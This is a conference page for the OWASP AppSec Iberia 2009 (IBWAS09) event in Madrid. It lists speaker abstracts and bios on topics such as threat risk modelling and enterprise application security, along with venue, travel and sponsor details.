Abstract: What kind of security do people ask for, and need, from the various service providers in an environment of liquidity, where every bit of information is available, and shared, all over the web in real time, all the time? Beyond these issues, the cloud, personal data, portability and the panoply of devices present new challenges to the developer.

Bio: Paulo Querido is a journalist and author long focused on technology and the Internet, and also a web entrepreneur and new media consultant. He lives in Portugal, but writes, and codes, wherever there is connectivity. As a journalist, he has worked for the most prestigious newspapers in his country, two decades for the weekly Expresso and occasionally for the daily Público, and he has published 3 books as an author and 3 others as co-author, all Internet-related. He has given several presentations, as well as TV, radio and print interviews and appearances in recent years, about social media and mainstream media. Ask Google about him: http://s3g.me/pq

link to presentation

Martin Knobloch

Title: Threat Risk Modelling

Abstract: How secure must an application be? To take the appropriate measures we have to identify the risks first and think about the measures later. Threat risk modelling is an essential process for secure web application development. It allows organizations to determine the correct controls and to produce effective countermeasures within budget. This presentation is about how to do Threat Risk Modelling: what is needed to start, and where to go from there!

Bio: Martin Knobloch is employed as a Software Architect at Sogeti Nederland B.V. He is founder and chair of the taskforce Proactive Security Strategy (PaSS). The taskforce focuses on application security over the whole application lifecycle. PaSS covers all the expertise involved in application development, from information analysts, through architecture, design and development, down to testers and application administrators. In his daily work, Martin is responsible for education in application security matters and for advising on and implementing application security measures for customers. Martin is a member of PVIB.nl and OWASP.org. At OWASP he is a member of the Dutch Chapter Board. Next to this he contributes to several projects such as the OWASP Boot Camp and the OWASP Speaker Project, and is project lead of the OWASP Education Project. Furthermore, Martin is a member of the OWASP Global Education Committee.

link to presentation

Javier Fernández-Sanguino

Title: Protection of applications at the enterprise in the real world: from audits to controls

Abstract: Securing application development in the enterprise world, where applications range from small in-house applications developed by a small department to large applications developed by an outsourcing company in a project spanning several years. In addition, applications that initially were not considered critical suddenly become part of a critical process, or those that were going to be used in a small and limited internal environment suddenly get promoted and published as a new service on the Internet. To get a better feeling of what works and what does not work in the harsh world outside, this talk will present examples of do's and don'ts coming from real-world projects attempting to protect applications at different stages: from the introduction of technical measures to prevent abuse of Internet-facing applications to source-code-driven application security testing.

Bio: A Telecommunications Engineer (ETSIT-UPM), he is the sub-director of Logical Security at Grupo Gesfor and an associate professor at Universidad Rey Juan Carlos. He has more than 10 years of experience in the ICT security sector, where he has worked as a consultant and security project manager, managing and participating in several security projects for the banking, industrial and telco sectors and for several public administration offices. He is also the author of multiple ICT security articles in the written press (including the magazine SIC, Seguridad, Informática y Comunicaciones) and a member of several open-source development groups such as Debian, and of international research and standardization groups in the security field: OWASP, OVAL and the Honeynet Project. He also leads and participates in the development of security tools, such as Tiger, Nessus and Bastille.

link to presentation

Venue

IBWAS09 will be taking place at the Escuela Universitaria de Ingeniería Técnica de Telecomunicación, Universidad Politécnica de Madrid in Madrid, Spain.

Location

Carretera de Valencia, Km 7
28031 Madrid
Tel: 91 336 78 42
Fax: 91 331 92 29

Find the location on Google Maps.

How to get there?

Car: from Autovía de Valencia A3 and from M40
Bus: City buses: E, 63, 145, 54, 58, 103, 142, 143; Intercity buses: 311A, 313A, 331, 332A and 337
Metro: Line 1, station Sierra de Guadalupe
Train: C-1, C-2 and C-7. Line: Atocha-Alcalá de Henares. Estación de Vallecas

Hotels

Information about the conference's recommended hotels can be found here.

Sponsors

We are currently soliciting sponsors for the IBWAS09 Conference. Please refer to our sponsorship opportunities for details.

Slots are going fast so contact us to sponsor today!

Sponsors

[Sponsor logos: Isecauditors, (ISC)², EUITT-UPM (www.euitt.upm.es)]

Media Sponsors

[Media sponsor logos: (IN)SECURE Magazine, Red Seguridad]

Supported by

[Supporter logos: Fortify, Gotham, ISACA, ATI, Syngress, Malmeida, J4m]

Media

Final Press Releases

First Press Releases

IBWAS'09 references on media

Internals

OWASP AppSec Iberia 2009 Internal Affairs